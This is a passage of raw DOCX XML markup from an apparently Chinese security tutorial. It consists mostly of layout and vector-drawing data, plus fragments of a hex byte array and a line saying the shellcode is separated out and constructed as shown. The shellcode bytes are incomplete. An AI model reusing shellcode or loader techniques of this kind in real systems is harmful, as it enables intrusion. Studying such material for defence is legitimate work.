          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xe2,0x22,0xb2,0xb3,0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xa6,0x43,0x3e,0x46,0xc5,0x0d,0xba,0x87,0xd5,0x6d,0x70,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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xfe,0x87,0x58,0x2c,0x4b,0x8c,0x2d,0x56,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0x21,0x4a,0xbf,0x45,0x8c,0xd9,0x9e,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xa0,0xe4,0x20,0x6b,0x7f,0xfb,0xd0,0x1e,0x88,0x13,0x6e,0x11,0xe9,0xd9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>};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52.6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其中分离s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hellcode。构造如下：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466.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="2000" w:right="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="PageMark6"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:711.83pt;width:0.0pt;height:130.916pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,14221" coordsize="0,2618">
        <v:shape style="position:absolute;left:10402;top:14221;width:0;height:2618" coordorigin="10402,14221" coordsize="0,2618" path="m10402,14221l10402,14221,10402,14221,10402,14221,10402,14221,10402,14221,10402,14221,10402,14222,10402,14222,10402,14222,10402,14222,10402,14223,10402,14223,10402,14224,10402,14225,10402,14225,10402,14226,10402,14228,10402,14229,10402,14230,10402,14232,10402,14234,10402,14236,10402,14238,10402,14240,10402,14243,10402,14245,10402,14248,10402,14252,10402,14255,10402,14259,10402,14263,10402,14267,10402,14272,10402,14277,10402,14282,10402,14288,10402,14294,10402,14300,10402,14306,10402,14313,10402,14321,10402,14328,10402,14336,10402,14345,10402,14354,10402,14363,10402,14372,10402,14382,10402,14393,10402,14404,10402,14415,10402,14427,10402,14440,10402,14452,10402,14466,10402,14480,10402,14494,10402,14509,10402,14524,10402,14540,10402,14557,10402,14574,10402,14591,10402,14610,10402,14628,10402,14648,10402,14668,10402,14688,10402,14710,10402,14732,10402,14754,10402,14777,10402,14801,10402,14826,10402,14851,10402,14877,10402,14903,10402,14931,10402,14959,10402,14987,10402,15017,10402,15047,10402,15078,10402,15110,10402,15142,10402,15175,10402,15209,10402,15244,10402,15280,10402,15317,10402,15354,10402,15392,10402,15431,10402,15471,10402,15512,10402,15553,10402,15596,10402,15639,10402,15684,10402,15729,10402,15775,10402,15822,10402,15870,10402,15919,10402,15969,10402,16020,10402,16072,10402,16125,10402,16178,10402,16233,10402,16289,10402,16346,10402,16404,10402,16463,10402,16523,10402,16584,10402,16646,10402,16710,10402,16774,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:710.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14210" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:14210;width:8990;height:670" coordorigin="1490,14210" coordsize="8990,670" path="m1510,14221l1510,14221,1510,14221,1510,14221,1510,14221,1510,14221,1510,14221,1511,14221,1512,14221,1512,14221,1514,14221,1515,14221,1517,14221,1519,14221,1521,14221,1524,14221,1528,14221,1532,14221,1536,14221,1541,14221,1546,14221,1552,14221,1559,14221,1566,14221,1575,14221,1583,14221,1593,14221,1603,14221,1615,14221,1627,14221,1640,14221,1654,14221,1668,14221,1684,14221,1701,14221,1719,14221,1738,14221,1758,14221,1780,14221,1802,14221,1826,14221,1851,14221,1877,14221,1904,14221,1933,14221,1963,14221,1995,14221,2028,14221,2063,14221,2099,14221,2136,14221,2175,14221,2216,14221,2259,14221,2303,14221,2348,14221,2396,14221,2445,14221,2496,14221,2549,14221,2604,14221,2660,14221,2719,14221,2779,14221,2841,14221,2906,14221,2972,14221,3041,14221,3112,14221,3184,14221,3259,14221,3336,14221,3416,14221,3498,14221,3582,14221,3668,14221,3757,14221,3848,14221,3941,14221,4037,14221,4136,14221,4236,14221,4340,14221,4446,14221,4555,14221,4666,14221,4780,14221,4897,14221,5017,14221,5139,14221,5264,14221,5392,14221,5523,14221,5657,14221,5793,14221,5933,14221,6076,14221,6222,14221,6370,14221,6522,14221,6677,14221,6835,14221,6997,14221,7161,14221,7329,14221,7500,14221,7675,14221,7853,14221,8034,14221,8219,14221,8407,14221,8598,14221,8793,14221,8992,14221,9194,14221,9400,14221,9609,14221,9823,14221,10039,14221,10260,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14222,10484,14222,10484,14222,10484,14222,10484,14222,10484,14222,10484,14223,10484,14223,10484,14223,10484,14224,10484,14224,10484,14225,10484,14225,10484,14226,10484,14227,10484,14227,10484,14228,10484,14229,10484,14230,10484,14231,10484,14232,10484,14233,10484,14234,10484,14235,10484,14237,10484,14238,10484,14239,10484,14241,10484,14243,10484,14244,10484,14246,10484,14248,10484,14250,10484,14252,10484,14255,10484,14257,10484,14259,10484,14262,10484,14265,10484,14267,10484,14270,10484,14273,10484,14276,10484,14280,10484,14283,10484,14286,10484,14290,10484,14294,10484,14298,10484,14302,10484,14306,10484,14310,10484,14315,10484,14319,10484,14324,10484,14329,10484,14334,10484,14339,10484,14344,10484,14350,10484,14356,10484,14361,10484,14367,10484,14374,10484,14380,10484,14386,10484,14393,10484,14400,10484,14407,10484,14414,10484,14422,10484,14429,10484,14437,10484,14445,10484,14453,10484,14462,10484,14470,10484,14479,10484,14488,10484,14497,10484,14507,10484,14516,10484,14526,10484,14536,10484,14547,10484,14557,10484,14568,10484,14579,10484,14590,10484,14601,10484,14613,10484,14625,10484,14637,10484,14649,10484,14662,10484,14675,10484,14688,10484,14701,10484,14715,10484,14729,10484,14743,10484,14757,10484,14772,10484,14787,10484,14802,10484,14817,10484,14833,10484,14849,10484,14865,10484,14881,10484,14881,10484,14882,10484,14881,10484,14882,10484,14881,10484,14881,10483,14881,10482,14881,10482,14881,10480,14881,10479,14882,10477,14881,10475,14882,10473,14881,10470,14882,10466,14882,10462,14881,10458,14881,10453,14881,10448,14882,10442,14881,10435,14882,10428,14882,10419,14882,10411,14882,10401,14881,10391,14882,10379,14881,10367,14881,10354,14882,10340,14882,10326,14881,10310,14882,10293,14881,10275,14881,10256,14881,10236,14882,10215,14881,10192,14882,10168,14881,10143,14882,10117,14881,10090,14882,10061,14881,10031,14882,9999,14881,9966,14882,9931,14881,9895,14882,9858,14881,9819,14882,9778,14881,9735,14882,9691,14881,9646,14881,9598,14881,9549,14882,9498,14881,9445,14882,9391,14881,9334,14881,9275,14881,9215,14881,9153,14881,9088,14881,9022,14881,8953,14881,8883,14881,8810,14881,8735,14881,8658,14881,8578,14881,8497,14881,8413,14881,8326,14881,8238,14881,8146,14881,8053,14881,7957,14881,7859,14881,7758,14881,7654,14881,7548,14881,7439,14881,7328,14881,7214,14881,7097,14881,6977,14881,6855,14881,6730,14881,6602,14881,6471,14881,6337,14881,6201,14881,6061,14881,5918,14882,5773,14881,5624,14881,5472,14881,5317,14881,5159,14881,4997,14881,4833,14881,4665,14881,4494,14881,4319,14881,4141,14881,3960,14882,3776,14881,3587,14881,3396,14881,3201,14881,3002,14881,2800,14881,2594,14881,2385,14881,2172,14881,1955,14881,1734,14882,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14880,1510,14880,1510,14880,1510,14880,1510,14879,1510,14879,1510,14878,1510,14878,1510,14877,1510,14877,1510,14876,1510,14875,1510,14875,1510,14874,1510,14873,1510,14872,1510,14871,1510,14870,1510,14869,1510,14867,1510,14866,1510,14865,1510,14863,1510,14862,1510,14860,1510,14858,1510,14856,1510,14854,1510,14852,1510,14850,1510,14848,1510,14846,1510,14843,1510,14841,1510,14838,1510,14835,1510,14833,1510,14830,1510,14826,1510,14823,1510,14820,1510,14816,1510,14813,1510,14809,1510,14805,1510,14801,1510,14797,1510,14793,1510,14788,1510,14784,1510,14779,1510,14774,1510,14769,1510,14764,1510,14758,1510,14753,1510,14747,1510,14741,1510,14735,1510,14729,1510,14723,1510,14716,1510,14709,1510,14703,1510,14696,1510,14688,1510,14681,1510,14673,1510,14665,1510,14657,1510,14649,1510,14641,1510,14632,1510,14623,1510,14614,1510,14605,1510,14596,1510,14586,1510,14576,1510,14566,1510,14556,1510,14546,1510,14535,1510,14524,1510,14513,1510,14501,1510,14490,1510,14478,1510,14466,1510,14453,1510,14441,1510,14428,1510,14415,1510,14401,1510,14388,1510,14374,1510,14360,1510,14346,1510,14331,1510,14316,1510,14301,1510,14286,1510,14270,1510,14254,1510,14238,1510,14221e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:710.400pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:743.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14870" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:14870;width:8990;height:370" coordorigin="1490,14870" coordsize="8990,370" path="m1510,14881l1510,14881,1510,14882,1510,14881,1510,14882,1510,14881,1510,14881,1511,14881,1512,14881,1512,14881,1514,14881,1515,14882,1517,14881,1519,14882,1521,14881,1524,14882,1528,14882,1532,14881,1536,14881,1541,14881,1546,14882,1552,14881,1559,14882,1566,14882,1575,14882,1583,14882,1593,14881,1603,14882,1615,14881,1627,14881,1640,14882,1654,14882,1668,14881,1684,14882,1701,14881,1719,14881,1738,14881,1758,14882,1780,14881,1802,14882,1826,14881,1851,14882,1877,14881,1904,14882,1933,14881,1963,14882,1995,14881,2028,14882,2063,14881,2099,14882,2136,14881,2175,14882,2216,14881,2259,14882,2303,14881,2348,14881,2396,14881,2445,14882,2496,14881,2549,14882,2604,14881,2660,14881,2719,14881,2779,14881,2841,14881,2906,14881,2972,14881,3041,14881,3112,14881,3184,14881,3259,14881,3336,14881,3416,14881,3498,14881,3582,14881,3668,14881,3757,14881,3848,14881,3941,14881,4037,14881,4136,14881,4236,14881,4340,14881,4446,14881,4555,14881,4666,14881,4780,14881,4897,14881,5017,14881,5139,14881,5264,14881,5392,14881,5523,14881,5657,14881,5793,14881,5933,14881,6076,14882,6222,14881,6370,14881,6522,14881,6677,14881,6835,14881,6997,14881,7161,14881,7329,14881,7500,14881,7675,14881,7853,14881,8034,14882,8219,14881,8407,14881,8598,14881,8793,14881,8992,14881,9194,14881,9400,14881,9609,14881,9823,14881,10039,14881,10260,14882,10484,14881,10484,14881,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14883,10484,14883,10484,14883,10484,14883,10484,14883,10484,14884,10484,14884,10484,14884,10484,14885,10484,14885,10484,14886,10484,14886,10484,14887,10484,14887,10484,14888,10484,14889,10484,14889,10484,14890,10484,14891,10484,14891,10484,14892,10484,14893,10484,14894,10484,14895,10484,14896,10484,14897,10484,14898,10484,14900,10484,14901,10484,14902,10484,14904,10484,14905,10484,14907,10484,14908,10484,14910,10484,14912,10484,14913,10484,14915,10484,14917,10484,14919,10484,14921,10484,14923,10484,14925,10484,14928,10484,14930,10484,14932,10484,14935,10484,14938,10484,14940,10484,14943,10484,14946,10484,14949,10484,14952,10484,14955,10484,14958,10484,14961,10484,14965,10484,14968,10484,14972,10484,14975,10484,14979,10484,14983,10484,14987,10484,14991,10484,14995,10484,14999,10484,15004,10484,15008,10484,15013,10484,15017,10484,15022,10484,15027,10484,15032,10484,15037,10484,15043,10484,15048,10484,15053,10484,15059,10484,15065,10484,15071,10484,15077,10484,15083,10484,15089,10484,15095,10484,15102,10484,15108,10484,15115,10484,15122,10484,15129,10484,15136,10484,15143,10484,15151,10484,15158,10484,15166,10484,15174,10484,15182,10484,15190,10484,15198,10484,15207,10484,15215,10484,15224,10484,15233,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10483,15242,10482,15242,10482,15242,10480,15242,10479,15242,10477,15242,10475,15242,10473,15242,10470,15242,10466,15242,10462,15242,10458,15242,10453,15242,10448,15242,10442,15242,10435,15242,10428,15242,10419,15242,10411,15242,10401,15242,10391,15242,10379,15242,10367,15242,10354,15242,10340,15242,10326,15242,10310,15242,10293,15242,10275,15242,10256,15242,10236,15242,10215,15242,10192,15242,10168,15242,10143,15242,10117,15242,10090,15242,10061,15242,10031,15242,9999,15242,9966,15242,9931,15242,9895,15242,9858,15242,9819,15242,9778,15242,9735,15242,9691,15242,9646,15242,9598,15242,9549,15242,9498,15242,9445,15242,9391,15242,9334,15242,9275,15242,9215,15242,9153,15242,9088,15242,9022,15242,8953,15242,8883,15242,8810,15242,8735,15242,8658,15242,8578,15242,8497,15242,8413,15242,8326,15242,8238,15242,8146,15242,8053,15242,7957,15242,7859,15242,7758,15242,7654,15242,7548,15242,7439,15242,7328,15242,7214,15242,7097,15242,6977,15242,6855,15242,6730,15242,6602,15242,6471,15242,6337,15242,6201,15242,6061,15242,5918,15242,5773,15242,5624,15242,5472,15242,5317,15242,5159,15242,4997,15242,4833,15242,4665,15242,4494,15242,4319,15242,4141,15242,3960,15242,3776,15242,3587,15242,3396,15242,3201,15242,3002,15242,2800,15242,2594,15242,2385,15242,2172,15242,1955,15242,1734,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15240,1510,15240,1510,15240,1510,15240,1510,15239,1510,15239,1510,15239,1510,15238,1510,15238,1510,15237,1510,15237,1510,15236,1510,15236,1510,15235,1510,15235,1510,15234,1510,15233,1510,15233,1510,15232,1510,15231,1510,15230,1510,15229,1510,15228,1510,15227,1510,15226,1510,15225,1510,15223,1510,15222,1510,15221,1510,15219,1510,15218,1510,15217,1510,15215,1510,15213,1510,15212,1510,15210,1510,15208,1510,15206,1510,15204,1510,15202,1510,15200,1510,15198,1510,15196,1510,15193,1510,15191,1510,15188,1510,15186,1510,15183,1510,15180,1510,15177,1510,15174,1510,15171,1510,15168,1510,15165,1510,15162,1510,15159,1510,15155,1510,15152,1510,15148,1510,15144,1510,15140,1510,15136,1510,15132,1510,15128,1510,15124,1510,15119,1510,15115,1510,15110,1510,15106,1510,15101,1510,15096,1510,15091,1510,15086,1510,15081,1510,15075,1510,15070,1510,15064,1510,15058,1510,15053,1510,15047,1510,15041,1510,15034,1510,15028,1510,15021,1510,15015,1510,15008,1510,15001,1510,14994,1510,14987,1510,14980,1510,14972,1510,14965,1510,14957,1510,14949,1510,14941,1510,14933,1510,14925,1510,14917,1510,14908,1510,14899,1510,14891,1510,14881e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:743.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14870" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:14870;width:30;height:370" coordorigin="1490,14870" coordsize="30,370" path="m1517,14881l1517,14881,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14883,1517,14883,1517,14883,1517,14883,1517,14883,1517,14884,1517,14884,1517,14884,1517,14885,1517,14885,1517,14886,1517,14886,1517,14887,1517,14887,1517,14888,1517,14889,1517,14889,1517,14890,1517,14891,1517,14891,1517,14892,1517,14893,1517,14894,1517,14895,1517,14896,1517,14897,1517,14898,1517,14900,1517,14901,1517,14902,1517,14904,1517,14905,1517,14907,1517,14908,1517,14910,1517,14912,1517,14913,1517,14915,1517,14917,1517,14919,1517,14921,1517,14923,1517,14925,1517,14928,1517,14930,1517,14932,1517,14935,1517,14938,1517,14940,1517,14943,1517,14946,1517,14949,1517,14952,1517,14955,1517,14958,1517,14961,1517,14965,1517,14968,1517,14972,1517,14975,1517,14979,1517,14983,1517,14987,1517,14991,1517,14995,1517,14999,1517,15004,1517,15008,1517,15013,1517,15017,1517,15022,1517,15027,1517,15032,1517,15037,1517,15043,1517,15048,1517,15053,1517,15059,1517,15065,1517,15071,1517,15077,1517,15083,1517,15089,1517,15095,1517,15102,1517,15108,1517,15115,1517,15122,1517,15129,1517,15136,1517,15143,1517,15151,1517,15158,1517,15166,1517,15174,1517,15182,1517,15190,1517,15198,1517,15207,1517,15215,1517,15224,1517,15233,1517,15242e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:761.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15230" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15230;width:8990;height:370" coordorigin="1490,15230" coordsize="8990,370" path="m1510,15242l1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1511,15242,1512,15242,1512,15242,1514,15242,1515,15242,1517,15242,1519,15242,1521,15242,1524,15242,1528,15242,1532,15242,1536,15242,1541,15242,1546,15242,1552,15242,1559,15242,1566,15242,1575,15242,1583,15242,1593,15242,1603,15242,1615,15242,1627,15242,1640,15242,1654,15242,1668,15242,1684,15242,1701,15242,1719,15242,1738,15242,1758,15242,1780,15242,1802,15242,1826,15242,1851,15242,1877,15242,1904,15242,1933,15242,1963,15242,1995,15242,2028,15242,2063,15242,2099,15242,2136,15242,2175,15242,2216,15242,2259,15242,2303,15242,2348,15242,2396,15242,2445,15242,2496,15242,2549,15242,2604,15242,2660,15242,2719,15242,2779,15242,2841,15242,2906,15242,2972,15242,3041,15242,3112,15242,3184,15242,3259,15242,3336,15242,3416,15242,3498,15242,3582,15242,3668,15242,3757,15242,3848,15242,3941,15242,4037,15242,4136,15242,4236,15242,4340,15242,4446,15242,4555,15242,4666,15242,4780,15242,4897,15242,5017,15242,5139,15242,5264,15242,5392,15242,5523,15242,5657,15242,5793,15242,5933,15242,6076,15242,6222,15242,6370,15242,6522,15242,6677,15242,6835,15242,6997,15242,7161,15242,7329,15242,7500,15242,7675,15242,7853,15242,8034,15242,8219,15242,8407,15242,8598,15242,8793,15242,8992,15242,9194,15242,9400,15242,9609,15242,9823,15242,10039,15242,10260,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15243,10484,15243,10484,15243,10484,15243,10484,15243,10484,15244,10484,15244,10484,15244,10484,15245,10484,15245,10484,15246,10484,15246,10484,15247,10484,15247,10484,15248,10484,15248,10484,15249,10484,15250,10484,15250,10484,15251,10484,15252,10484,15253,10484,15254,10484,15255,10484,15256,10484,15257,10484,15258,10484,15259,10484,15261,10484,15262,10484,15263,10484,15265,10484,15266,10484,15268,10484,15270,10484,15271,10484,15273,10484,15275,10484,15277,10484,15279,10484,15281,10484,15283,10484,15285,10484,15287,10484,15290,10484,15292,10484,15295,10484,15297,10484,15300,10484,15303,10484,15306,10484,15309,10484,15312,10484,15315,10484,15318,10484,15321,10484,15325,10484,15328,10484,15332,10484,15336,10484,15339,10484,15343,10484,15347,10484,15351,10484,15356,10484,15360,10484,15364,10484,15369,10484,15374,10484,15378,10484,15383,10484,15388,10484,15393,10484,15399,10484,15404,10484,15409,10484,15415,10484,15421,10484,15427,10484,15433,10484,15439,10484,15445,10484,15451,10484,15458,10484,15464,10484,15471,10484,15478,10484,15485,10484,15492,10484,15499,10484,15507,10484,15514,10484,15522,10484,15530,10484,15538,10484,15546,10484,15554,10484,15563,10484,15572,10484,15580,10484,15589,10484,15598,10484,15607,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10483,15617,10482,15617,10482,15617,10480,15617,10479,15617,10477,15617,10475,15617,10473,15617,10470,15617,10466,15617,10462,15617,10458,15617,10453,15617,10448,15617,10442,15617,10435,15617,10428,15617,10419,15617,10411,15617,10401,15617,10391,15617,10379,15617,10367,15617,10354,15617,10340,15617,10326,15617,10310,15617,10293,15617,10275,15617,10256,15617,10236,15617,10215,15617,10192,15617,10168,15617,10143,15617,10117,15617,10090,15617,10061,15617,10031,15617,9999,15617,9966,15617,9931,15617,9895,15617,9858,15617,9819,15617,9778,15617,9735,15617,9691,15617,9646,15617,9598,15617,9549,15617,9498,15617,9445,15617,9391,15617,9334,15617,9275,15617,9215,15617,9153,15617,9088,15617,9022,15617,8953,15617,8883,15617,8810,15617,8735,15617,8658,15617,8578,15617,8497,15617,8413,15617,8326,15617,8238,15617,8146,15617,8053,15617,7957,15617,7859,15617,7758,15617,7654,15617,7548,15617,7439,15617,7328,15617,7214,15617,7097,15617,6977,15617,6855,15617,6730,15617,6602,15617,6471,15617,6337,15617,6201,15617,6061,15617,5918,15617,5773,15617,5624,15617,5472,15617,5317,15617,5159,15617,4997,15617,4833,15617,4665,15617,4494,15617,4319,15617,4141,15617,3960,15617,3776,15617,3587,15617,3396,15617,3201,15617,3002,15617,2800,15617,2594,15617,2385,15617,2172,15617,1955,15617,1734,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15615,1510,15615,1510,15615,1510,15615,1510,15614,1510,15614,1510,15613,1510,15613,1510,15612,1510,15612,1510,15611,1510,15611,1510,15610,1510,15610,1510,15609,1510,15608,1510,15607,1510,15606,1510,15606,1510,15605,1510,15604,1510,15603,1510,15602,1510,15600,1510,15599,1510,15598,1510,15597,1510,15595,1510,15594,1510,15592,1510,15591,1510,15589,1510,15587,1510,15586,1510,15584,1510,15582,1510,15580,1510,15578,1510,15576,1510,15573,1510,15571,1510,15569,1510,15566,1510,15564,1510,15561,1510,15559,1510,15556,1510,15553,1510,15550,1510,15547,1510,15544,1510,15541,1510,15537,1510,15534,1510,15530,1510,15527,1510,15523,1510,15519,1510,15515,1510,15511,1510,15507,1510,15503,1510,15499,1510,15494,1510,15490,1510,15485,1510,15480,1510,15475,1510,15470,1510,15465,1510,15460,1510,15455,1510,15449,1510,15443,1510,15438,1510,15432,1510,15426,1510,15420,1510,15414,1510,15407,1510,15401,1510,15394,1510,15387,1510,15381,1510,15374,1510,15366,1510,15359,1510,15352,1510,15344,1510,15336,1510,15329,1510,15321,1510,15312,1510,15304,1510,15296,1510,15287,1510,15278,1510,15269,1510,15260,1510,15251,1510,15242e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:761.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15230" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:15230;width:30;height:390" coordorigin="1490,15230" coordsize="30,390" path="m1517,15242l1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15243,1517,15243,1517,15243,1517,15243,1517,15243,1517,15244,1517,15244,1517,15244,1517,15245,1517,15245,1517,15246,1517,15246,1517,15247,1517,15247,1517,15248,1517,15248,1517,15249,1517,15250,1517,15250,1517,15251,1517,15252,1517,15253,1517,15254,1517,15255,1517,15256,1517,15257,1517,15258,1517,15259,1517,15261,1517,15262,1517,15263,1517,15265,1517,15266,1517,15268,1517,15270,1517,15271,1517,15273,1517,15275,1517,15277,1517,15279,1517,15281,1517,15283,1517,15285,1517,15287,1517,15290,1517,15292,1517,15295,1517,15297,1517,15300,1517,15303,1517,15306,1517,15309,1517,15312,1517,15315,1517,15318,1517,15321,1517,15325,1517,15328,1517,15332,1517,15336,1517,15339,1517,15343,1517,15347,1517,15351,1517,15356,1517,15360,1517,15364,1517,15369,1517,15374,1517,15378,1517,15383,1517,15388,1517,15393,1517,15399,1517,15404,1517,15409,1517,15415,1517,15421,1517,15427,1517,15433,1517,15439,1517,15445,1517,15451,1517,15458,1517,15464,1517,15471,1517,15478,1517,15485,1517,15492,1517,15499,1517,15507,1517,15514,1517,15522,1517,15530,1517,15538,1517,15546,1517,15554,1517,15563,1517,15572,1517,15580,1517,15589,1517,15598,1517,15607,1517,15617e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:253.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:342.600pt;width:310.800pt;height:222.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId18" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:745.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,14910" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:14910;width:130;height:270" coordorigin="1950,14910" coordsize="130,270" path="m1975,14927l1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1975,14927,1976,14927,1976,14927,1976,14927,1976,14927,1976,14927,1976,14927,1976,14927,1976,14927,1977,14927,1977,14927,1977,14927,1977,14927,1977,14927,1978,14927,1978,14927,1978,14927,1978,14927,1979,14927,1979,14927,1979,14927,1980,14927,1980,14927,1980,14927,1981,14927,1981,14927,1981,14927,1982,14927,1982,14927,1983,14927,1983,14927,1984,14927,1984,14927,1985,14927,1986,14927,1986,14927,1987,14927,1988,14927,1988,14927,1989,14927,1990,14927,1990,14927,1991,14927,1992,14927,1993,14927,1994,14927,1995,14927,1995,14927,1996,14927,1997,14927,1998,14927,1999,14927,2000,14927,2002,14927,2003,14927,2004,14927,2005,14927,2006,14927,2008,14927,2009,14927,2010,14927,2011,14927,2013,14927,2014,14927,2016,14927,2017,14927,2019,14927,2020,14927,2022,14927,2024,14927,2025,14927,2027,14927,2029,14927,2030,14927,2032,14927,2034,14927,2036,14927,2038,14927,2040,14927,2042,14927,2044,14927,2046,14927,2048,14927,2051,14927,2053,14927,2055,14927,2057,14927,2060,14927,2062,14927,2065,14927,2067,14927,2070,14927,2072,14927,2075,14927,2078,14927,2081,14927,2083,14927,2086,14927,2089,14927,2092,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14927,2095,14928,2095,14928,2095,14928,2095,14928,2095,14928,2095,14929,2095,14929,2095,14929,2095,14930,2095,14930,2095,14930,2095,14931,2095,14931,2095,14931,2095,14932,2095,14932,2095,14933,2095,14934,2095,14934,2095,14935,2095,14936,2095,14936,2095,14937,2095,14938,2095,14939,2095,14939,2095,14940,2095,14941,2095,14942,2095,14943,2095,14944,2095,14945,2095,14947,2095,14948,2095,14949,2095,14950,2095,14952,2095,14953,2095,14955,2095,14956,2095,14958,2095,14959,2095,14961,2095,14963,